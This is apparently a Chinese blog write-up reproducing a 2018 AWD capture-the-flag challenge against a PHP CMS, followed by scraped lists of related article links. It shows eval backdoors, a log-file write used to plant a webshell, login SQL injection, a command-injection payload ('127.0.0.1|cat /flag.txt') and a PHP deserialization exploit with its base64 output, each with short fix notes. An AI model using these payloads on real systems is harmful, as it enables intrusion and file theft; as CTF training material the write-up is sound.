首先这里需要搭建一个cms的平台得到：

利用D盾进行漏洞扫描得到：

5级的eval后门漏洞

可以看到这里有一个5级的eval后门漏洞，我们查看文件得到源码：

这是一句话后门，我们利用一下这个后门得到：

这里能cat flag

修补增加过滤或者删除漏洞

2级的fwrite审计：

利用seay工具进行代码审计：
源码：

可以发现这是一个日志记录，但是它把记录的日志都写入到了
/var/www/html/log.php文件，这就造成文件写入漏洞

我们利用这个log1.php用get的方式写一个<?php phpinfo();?>
测试一下漏洞：

然后我们访问log.php文夹得到：

发现执行了phpinfo()；

所以我们可以利用这个文件写入，去写入一句话木马

修复：

1、可以把log.php改成log.txt
2、增加危险字符过滤

2级漏洞eval(get_defined_vars()[’_GET’][‘cmd’]);

查看源码得到：

get_defined_vars()此函数返回一个包含所有已定义变量列表的多维数组，这些变量包括环境变量、服务器变量和用户定义的变量。

所有会获取所有的get方法，所有直接cmd执行命令：

修复：
1、进行危险字符过滤
2、把后门删除

在利用seay进行代码审计：

首先我们分析一下首页，index.php
：

发现包含了很多文件，这里有个/common/function.php文件
我们去访问这个文件得到：

可以看到这里把c作为一个对象，a作为一个方法进行调研

在index.php中可以看到，如果不给c传值会赋值为User
所有c的对象为User.php文件
所有看向User.php文件

我可以看到User这个类功还是挺多的，我们看向Login方法

sql注入

发现这里没有任何的过滤，所有登陆界面存在sql注入：

登陆得到：

修复：
进行危险字符过滤

命令执行

我在User.php看到：

看到这里有一个命令执行
我们在index.php哪里进行get请求
a=User&c=ping

然后在进行host请求：

发现执行了命令
利用命令：

127.0.0.1|cat /flag.txt

修复漏洞;
进行危险字符过滤

反序列化

在seay中全局查询反序列化函数得到：

反序列化漏洞源码：

payload:

class home{private $method;private $args;
}$a = new home("ping",array('127.0.0.1|cat  /flag.txt'));$b = serialize($a);echo base64_encode($b);

得到：

Tzo0OiJob21lIjoyOntzOjEyOiIAaG9tZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGhvbWUAYXJncyI7YToxOntpOjA7czoyNDoiMTI3LjAuMC4xfGNhdCAJL2ZsYWcudHh0Ijt9fQ==

得到flag。

漏洞修补：

过滤危险字符

本人比较菜漏洞审计就到这里，不妥的地方大佬勿喷

其它漏洞我也审计不出来直接上waf通防范。

2018领航杯awd简单复现相关推荐

1. 2018蓝桥杯校选复现7

   题目 众所周知,ccm不仅擅长数据结构,还擅长带妹吃鸡.某日,ccm与yblin四排带妹,yblin提出了十分优秀的战略部署:平原跳伞.分散打钱.于是,,,他们队伍里就只剩ccm了.为了带妹纸躺赢,c ...

2. awd的批量脚本 pwn_北极星杯 awd复现

   北极星杯 awd复现 服务器共有3个web和一个pwn web1 1,down下web1的源码,使用D盾扫描: 2,漏洞1:发现三个冰蝎的木马,和一个一句话木马 冰蝎的后门需要使用冰蝎的客户端进行连接 ...

3. 阿里云天池 - 2018之江杯全球人工智能大赛 之零样本图像目标识别 参赛总结

   9月份报名做了 2018之江杯全球人工智能大赛 之零样本图像目标识别 的这道题 -     题目链接-https://tianchi.aliyun.com/competition/entrance/2 ...

4. #2019江苏领航杯部分wp

   关于2019领航杯部分wp 队友的wp 两天前参加了领航杯,奋斗了24小时,做出了十几题. 第一题签到题 base64解码 第三题steganoI 一个简单的隐写,可以用strings查看他的信息 第 ...

5. 高薪寻人 | 2018 “神策杯”高校算法大师赛 6 强诞生，【招人】进行时……

   近日,2018 "神策杯"高校算法大师赛在北京落下帷幕. 此次比赛共提交近 3000 份优秀作品,近 600 支队伍激情参与,神策数据专家团队通过作品评估.成果展示.现场路演等层层 ...

6. 2018 “神策杯”高校算法大师赛 6 强诞生，【招人】进行时……

   近日,2018 "神策杯"高校算法大师赛在北京落下帷幕. 此次比赛共提交近 3000 份优秀作品,近 600 支队伍激情参与,神策数据专家团队通过作品评估.成果展示.现场路演等层层 ...

7. nginx解析漏洞简单复现及修复

   Nginx简介 Nginx是一款轻量级的web服务器/反向代理服务器及电子邮件(IMAP/POP3)代理服务器,其特点是占内存小.并发能力强:国内使用Nginx的有百度.京东.新浪.网易.腾讯.淘宝等 ...

8. 大赛报名 | 2023“领航杯”国际创新创业大赛项目征集启动

   全国创业大赛热点资讯 2023"领航杯"国际创新创业大赛 3月31日下午,2023"领航杯"国际创新创业大赛启动,面向"半导体.生命健康.新能源新材料 ...

9. 蓝桥杯ACM简单题－生日蜡烛 2020-12-22

   蓝桥杯ACM简单题-生日蜡烛 1.问题描述 某人从某年开始每年都举办一次生日派对,并且每次都要吹熄与年龄相同根数的蜡烛.现在算起来,他一共吹熄了236根蜡烛.请问,他从多少岁开始过生日派对的? 2.算 ...

最新文章

1. Zeal编程查询，离线文档浏览器
2. 简单探索MNIST（Softmax回归和两层CNN）-Tensorflow学习
3. unity导入素材时材质丢失素材变成粉红色的解决方法
4. 《深入体验Java Web开发内幕——核心基础》目录
5. Visual Studio 解决方案版本从v12--＞v14
6. 类 kotlin(13)
7. 【pandas】column变index，dataframe转置
8. 车辆动力学模型在仿真测试中的应用实践
9. Ant Design Vue下载本地文件（其他框架也适用）
10. itext设置字体间距_Java使用iText生成pdf
11. 天龙八部排名(三联版)
12. 4418linux内核源码,4418开发板Uboot内核文件系统编译脚本分析
13. 视打击微软 力挺国产红旗Linux
14. 哈希（哈希表的应用）
15. How to Install Nvidia Kernel Module Cuda and Pyrit in Kali Linux
16. 简单介绍java中的强制类型转换
17. 什么是FD.IO/VPP？
18. linux权限sudo和su,Linux中su与sudo、su - root的区别
19. 是的，奈学教育一周年了！
20. Linux下的视频采集（V4L2）

热门文章

1. ysoserial CC5利用链分析
2. From.Designer.cs和From.cs的关系
3. JAXWS CXF WSDL first + MyEclipse + Maven Byron自學視頻03
4. MySQL数据操作语言——插入语句、修改语句和删除语句
5. 设置Asterisk座席实时监控
6. Web版2048游戏制作
7. win7设置定时锁定计算机,Windows7电脑屏幕如何设置不自动锁屏
8. GPA计算（5.0分制）
9. ICC2: secondary pg pin的作用与连接
10. 【android】简易的登陆界面的xml设计——代码复用，节省时间